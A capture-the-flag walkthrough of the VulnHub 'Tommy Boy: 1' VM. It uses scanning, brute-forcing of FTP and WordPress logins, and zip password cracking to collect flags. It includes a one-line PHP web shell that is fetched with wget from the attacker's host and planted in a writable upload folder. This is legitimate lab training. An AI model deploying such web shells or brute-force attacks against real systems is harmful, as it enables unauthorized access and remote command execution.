[VulnHub] Tommy Boy: 1

“HOLY SCHNIKES! Tommy Boy needs your help!

The Callahan Auto company has finally entered the world of modern technology and stood up a Web server for their customers to use for ordering brake pads.

Unfortunately, the site just went down and the only person with admin credentials is Tom Callahan Sr. - who just passed away! And to make matters worse, the only other guy with knowledge of the server just quit!

You’ll need to help Tom Jr., Richard and Michelle get the Web page restored again. Otherwise Callahan Auto will most certainly go out of business :-(“ – Brian Johnson

More information and OVA file download please check here.

Attacker & Target

Attacker: Kali2 Linux (10.1.1.132/24)

Target: Tommy Boy 1.0 (10.1.1.141/24)

Tools

All the tools used here can be found in Kali Linux

Walkthrough

Using arp-scan as routine to detect the target’s IP address.

1
2
3
4
5
6
7
8
9
10
root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.1.1.1  00:50:56:c0:00:08   VMware, Inc.
10.1.1.2  00:50:56:f1:61:7e   VMware, Inc.
10.1.1.141    00:0c:29:8f:0f:b7   VMware, Inc.
10.1.1.254    00:50:56:f1:c0:1f   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.363 seconds (108.34 hosts/sec). 4 responded

10.1.1.141 is our Target!

Then run masscan to detect opening ports on the target (masscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).

1
2
3
4
5
6
7
8
9
10
root@kali:~/myExercises/tommyboy1# masscan -p1-65535 10.1.1.141/32 --rate=10000

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2016-09-04 11:29:55 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 8008/tcp on 10.1.1.141
Discovered open port 22/tcp on 10.1.1.141
Discovered open port 80/tcp on 10.1.1.141
Discovered open port 65534/tcp on 10.1.1.141
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
...truncated...
Nmap scan report for 10.1.1.141
Host is up (0.00035s latency).
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
|_  256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
| http-robots.txt: 4 disallowed entries
| /6packsofb...soda /lukeiamyourfather
|_/lookalivelowbridge /flag-numero-uno.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to Callahan Auto
8008/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: KEEP OUT
65534/tcp open  ftp     ProFTPD
MAC Address: 00:0C:29:8F:0F:B7 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
...truncated...

Based on the result of NMAP scan, firstly, I found OpenSSH 7.2p2 running on port 22, Apache httpd 2.4.18 running on port 80 and 8008 and ProFTPd running on port 65534.

In the meanwhile, I run nikto to scan web vulnerabilities.

Nothing found on port 8008, however, there are some interesting findings from nikto scan on port 80:

1
2
3
4
5
6
7
8
+ Entry '/6packsofb...soda' in robots.txt returned a non-forbidden or redirect HTTP code (301)
+ OSVDB-3268: /lukeiamyourfather/: Directory indexing found.
+ Entry '/lukeiamyourfather/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /lookalivelowbridge/: Directory indexing found.
+ Entry '/lookalivelowbridge/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/flag-numero-uno.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 4 entries which should be manually viewed.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS

I noticed that the robot file robots.txt is found and including 4 entries:

1
2
3
4
5
User-agent: *
Disallow: /6packsofb...soda
Disallow: /lukeiamyourfather
Disallow: /lookalivelowbridge
Disallow: /flag-numero-uno.txt

The 1st Flag

The 1st Flag is B34rcl4ws

Also checked other folders but nothing found, so I decited to move on.

Then, by checking the source code of index page on port 80, hidden comments are found:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<html>
<title>Welcome to Callahan Auto</title>
<body>
<H1><center>Welcome to Callahan Auto!</center></H1>
<font color="FF3339"><H2>SYSTEM ERROR!</H2></font>
If your'e reading this, the Callahan Auto customer ordering system is down.  Please restore the backup copy immediately.
<p>
See Nick in IT for assistance.
</html>
<!--Comment from Nick: backup copy is in Big Tom's home folder-->
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password-->
<!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time-->
<!--Comment from Richard: please, I'll ask nicely-->
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog-->
<!--Comment from Richard: Deal.  Where's the blog again?-->
<!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8-->
<!--Comment from Richard: Ah! How could I forget?  Thanks-->

From the comment, I got a YouTube hint: https://www.youtube.com/watch?v=VUxOd4CszJ8, after checked the youtube, I got the hidden blog path is http://10.1.1.141/prehistoricforest.

From the YouTube video, I got the key to access to the hidden blog (Hint: if met Database Error, restart the target VM should fix the problem) and found the 2nd flag clue under the post Announcing the Callahan internal company blog!, the URL is http://10.1.1.141/prehistoricforest/index.php/2016/07/06/announcing-the-callahan-internal-company-blog/

The 2nd Flag

The 2nd Flag is Z4l1nsky

Another hint from the post SON OF A!:

There is another Image File under the folder http://10.1.1.141/richard/shockedrichard.jpg

By checking the imga file with tool exif, I noticed that there is a MD5 hash in User Comment:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root@kali:~/myExercises/tommyboy1# exif shockedrichard.jpg
EXIF tags in 'shockedrichard.jpg' ('Intel' byte order):
--------------------+----------------------------------------------------------
Tag                 |Value
--------------------+----------------------------------------------------------
Software            |Google
Copyright           |Copyright © 1995 Paramount Pictures Corporation. Credit: ©
X-Resolution        |72
Y-Resolution        |72
Resolution Unit     |Inch
Exif Version        |Exif Version 2.2
User Comment        |ce154b5a8e59c89732bc25d6a2e6b90b
Pixel X Dimension   |1600
Pixel Y Dimension   |1029
FlashPixVersion     |FlashPix Version 1.0
Color Space         |Internal error (unknown value 65535)
--------------------+----------------------------------------------------------

By cracking the hash online and got the cracked password is spanky>

In the other post Protected: Status of restoring company home page, I found a password is needed.

Then I input spanky as the password and got into the protected blog.

Some important information from the blog:

  • In order to restore, there is a backup file called callahanbak.bak that we can rename it to index.html. (We have to do this under Big Tom’s account via SSH)

  • Big Tom’s account name should be able to find in the user list and may not be called as bigtom but easy to recognize.

  • There is a FTP service running on non-standard port (65543, which is found by NMAP in the previous step) and can be accessed by nick’s account.

  • Nick’s account name is nickburns and the password is very easy to guess.

  • Nick is not able to access SSH but only FTP.

Based on the information above, I use hydra to do a quick brute force scanning:

1
2
3
4
5
6
7
8
9
root@kali:~/myExercises/tommyboy1# hydra -e nsr -l nickburns ftp://10.1.1.141:65534/
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-09-04 22:36:19
[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task
[DATA] attacking service ftp on port 65534
[65534][ftp] host: 10.1.1.141   login: nickburns   password: nickburns
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-09-04 22:36:20

and found Nick’s FTP login credencial is nickburns / nickburns

Now I login to FTP as Nick and downloaded the only file readme.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@kali:~/myExercises/tommyboy1# ftp 10.1.1.141 65534
Connected to 10.1.1.141.
220 Callahan_FTP_Server 1.3.5
Name (10.1.1.141:root): nickburns
331 Password required for nickburns
Password:
230 User nickburns logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> list
?Invalid command
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 nickburns nickburns      977 Jul 15 02:37 readme.txt
226 Transfer complete
ftp> get readme.txt
local: readme.txt remote: readme.txt
200 PORT command successful
150 Opening BINARY mode data connection for readme.txt (977 bytes)
226 Transfer complete
977 bytes received in 0.02 secs (40.6745 kB/s)
ftp> bye
221 Goodbye.

Due to this is WordPress application, I use wpscan to check if any vulnerability exists and enumerate users:

1
2
3
4
5
6
7
8
9
10
11
...truncated...
[+] Identified the following 4 user/s:
    +----+----------+-------------------+
    | Id | Login    | Name              |
    +----+----------+-------------------+
    | 1  | richard  | richard           |
    | 2  | tom      | Big Tom           |
    | 3  | tommy    | Tom Jr.           |
    | 4  | michelle | Michelle Michelle |
    +----+----------+-------------------+
...truncated...

Four WP users found:

1
2
3
4
richard
tom
tommy
michelle

Then use dictionary file rockyou.txt to brute force crack those users, and got tom’s password cracked:

1
2
3
4
5
6
7
8
  +----+----------+-------------------+----------+
  | Id | Login    | Name              | Password |
  +----+----------+-------------------+----------+
  | 1  | richard  | richard           |          |
  | 2  | tom      | Big Tom           | tomtom1  |
  | 3  | tommy    | Tom Jr.           |          |
  | 4  | michelle | Michelle Michelle |          |
  +----+----------+-------------------+----------+

After change User-Agent to Iphone 3, I got the different content!

Use wfuzz with rockyou.txt to find out the hidden html file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~# wfuzz -c -v -w /usr/share/wordlists/rockyou.txt -H "User-Agent:Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" --hc 404 http://10.1.1.141:8008/NickIzL33t/FUZZ.html
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://10.1.1.141:8008/NickIzL33t/FUZZ.html
Total requests: 14344392


==============================================================================================================================================
ID    C.Time   Response   Lines      Word         Chars                  Server                                             Redirect   Request
==============================================================================================================================================

97206:  0.040s   C=200     12 L        65 W       459 Ch     Apache/2.4.18 (Ub                                                        "fallon1"
...truncated...

The 3rd Flag

The 2nd Flag is TinyHead

Here is also an encrypted backup zip file t0msp4ssw0rdz.zip and also a hint file which including the clues about password:

Password information:

  • start with bev
  • one uppercase character
  • two numbers
  • two lowercase characters
  • one symbol
  • 1955

bev[A-Z][0-9][0-9][a-z][a-z][symbol]1955

Then I use crunch to generate a dictionary list with given pattern:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~/myExercises/tommyboy1# crunch 13 13 -t bev,%%@@^1995 -o pass_dict.lst
Crunch will now generate the following amount of data: 812011200 bytes
774 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 58000800

crunch:  27% completed generating output

crunch:  53% completed generating output

crunch:  83% completed generating output

crunch: 100% completed generating output

Then use fcrackzip with the generated dictionary file to crack the encrypted store zip file:

1
2
3
4
5
root@kali:~/myExercises/tommyboy1# fcrackzip -v -D -u -p pass_dict.lst t0msp4ssw0rdz.zip
found file 'passwords.txt', (size cp/uc    332/   641, flags 9, chk 9aad)
checking pw bevG72kn~1995

PASSWORD FOUND!!!!: pw == bevH00tr$1995

The password is bevH00tr$1995 and the unzipped file is password.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@kali:~/myExercises/tommyboy1# cat passwords.txt
Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money

TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat

Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ???
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.

After login to the blog as Big Tom by using the password found previously in wpscan stage, I noticed that there is a draft post:

Now I got the Server SSH login password:

1
2
3
4
Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat1938!!

Login to SSH as Big Tom:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
root@kali:~/myExercises/tommyboy1# ssh bigtommysenior@10.1.1.141
The authenticity of host '10.1.1.141 (10.1.1.141)' can't be established.
ECDSA key fingerprint is SHA256:bI4/w4tR6j1XRyuLkIs5icsyLJM0Kfw9m4iPFpXX0NI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.1.141' (ECDSA) to the list of known hosts.
bigtommysenior@10.1.1.141's password:
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

112 packages can be updated.
0 updates are security updates.


Last login: Thu Jul 14 13:45:57 2016
bigtommysenior@CallahanAutoSrv01:~$ id
uid=1002(bigtommysenior) gid=1002(bigtommysenior) groups=1002(bigtommysenior)
bigtommysenior@CallahanAutoSrv01:~$ uname -a
Linux CallahanAutoSrv01 4.4.0-36-generic #55-Ubuntu SMP Thu Aug 11 18:01:55 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
bigtommysenior@CallahanAutoSrv01:~$ pwd
/home/bigtommysenior
bigtommysenior@CallahanAutoSrv01:~$ ls -la
total 40
drwxr-x--- 4 bigtommysenior bigtommysenior 4096 Jul  8 08:57 .
drwxr-xr-x 5 root           root           4096 Jul  7 00:17 ..
-rw------- 1 bigtommysenior bigtommysenior    0 Jul 21 17:47 .bash_history
-rw-r--r-- 1 bigtommysenior bigtommysenior  220 Jul  7 00:12 .bash_logout
-rw-r--r-- 1 bigtommysenior bigtommysenior 3771 Jul  7 00:12 .bashrc
drwx------ 2 bigtommysenior bigtommysenior 4096 Jul  7 00:16 .cache
-rw-r--r-- 1 bigtommysenior bigtommysenior  307 Jul  7 14:18 callahanbak.bak
-rw-rw-r-- 1 bigtommysenior bigtommysenior  237 Jul  7 15:27 el-flag-numero-quatro.txt
-rw-rw-r-- 1 bigtommysenior bigtommysenior  630 Jul  7 17:59 LOOT.ZIP
drwxrwxr-x 2 bigtommysenior bigtommysenior 4096 Jul  7 13:50 .nano
-rw-r--r-- 1 bigtommysenior bigtommysenior  675 Jul  7 00:12 .profile
-rw-r--r-- 1 bigtommysenior bigtommysenior    0 Jul  7 00:17 .sudo_as_admin_successful
bigtommysenior@CallahanAutoSrv01:~$ 

The 4th Flag

1
2
3
4
5
6
7
8
9
bigtommysenior@CallahanAutoSrv01:~$ cat el-flag-numero-quatro.txt
YAY!  Flag 4 out of 5!!!! And you should now be able to restore the Callhan Web server to normal
working status.

Flag data: EditButton

But...but...where's flag 5?  

I'll make it easy on you.  It's in the root of this server at /5.txt

Then doing the restoring the web site from backup, I got he server back online again:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
bigtommysenior@CallahanAutoSrv01:~$ cp callahanbak.bak /var/www/html/index.html
bigtommysenior@CallahanAutoSrv01:~$ ls -l /var/www/html/index.html
-rw-r--r-- 1 bigtommysenior bigtommysenior 307 Sep  5 07:16 /var/www/html/index.html
bigtommysenior@CallahanAutoSrv01:~$ cat /var/www/html/index.html
<html>
<title>Welcome to Callahan Auto</title>
<body>
<H1><center>Welcome to Callahan Auto!</center></H1>
<font color="0000ff"><H2><center>SYSTEM STATUS: ONLINE</center></H2></font>
<H3>We're happy to be serving all your brakepad needs.</H3>
<p>
<center><img src="ca.jpeg"></center>
<p>
<p>
</html>
<!---->

By doing enumeration and found the following world-writable folders:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
bigtommysenior@CallahanAutoSrv01:/var/www/html$ find / -perm -222 -type d 2>/dev/null
/var/lib/php/sessions
/var/crash
/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads
/var/tmp
/dev/mqueue
/dev/shm
/run/lock
/tmp
/tmp/.XIM-unix
/tmp/.Test-unix
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/.X11-unix

Now upload single-line php shell to the writable folder /var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads and name it to sh.php

The PHP shell:

1
2
root@kali:/var/www/html# cat shell.php
<?php system($_GET['cmd']); ?>

Upload it to target:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ wget http://10.1.1.132/shell.php -O sh.php
--2016-09-05 07:38:35--  http://10.1.1.132/shell.php
Connecting to 10.1.1.132:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31
Saving to: ‘sh.php’

sh.php                                              100%[================================================================================================================>]      31  --.-KB/s    in 0s

2016-09-05 07:38:35 (6.03 MB/s) - ‘sh.php’ saved [31/31]

bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ ls -la
total 20
drwxrwxrwx 2 www-data       www-data       4096 Sep  5 07:38 .
drwxr-xr-x 3 www-data       www-data       4096 Jul 15 12:47 ..
-rw-r--r-- 1 root           root            243 Jul 15 12:23 .htaccess
-rw-r--r-- 1 root           root            447 Jul 15 12:32 index.html
-rw-rw-r-- 1 bigtommysenior bigtommysenior   31 Aug 24 06:43 sh.php

The 5th Flag

Found the 5th flag file:

The 5th flag is Buttcrack

Ok now blob all the flag together to make the password: B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack

Great, now to open the LOOT.ZIP file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
bigtommysenior@CallahanAutoSrv01:~$ unzip LOOT.ZIP
Archive:  LOOT.ZIP
[LOOT.ZIP] THE-END.txt password:
  inflating: THE-END.txt
bigtommysenior@CallahanAutoSrv01:~$ ls
callahanbak.bak  el-flag-numero-quatro.txt  LOOT.ZIP  THE-END.txt
bigtommysenior@CallahanAutoSrv01:~$ cat THE-END.txt
YOU CAME.
YOU SAW.
YOU PWNED.

Thanks to you, Tommy and the crew at Callahan Auto will make 5.3 cajillion dollars this year.

GREAT WORK!

I'd love to know that you finished this VM, and/or get your suggestions on how to make the next 
one better.

Please shoot me a note at 7ms @ 7ms.us with subject line "Here comes the meat wagon!"

Or, get in touch with me other ways:

* Twitter: @7MinSec
* IRC (Freenode): #vulnhub (username is braimee)

Lastly, please don't forget to check out www.7ms.us and subscribe to the podcast at
bit.ly/7minsec

</shamelessplugs>

Thanks and have a blessed week!

-Brian Johnson
7 Minute Security

Hooooo, finally, Got it!!

2016-09-13 07:40:53 -0400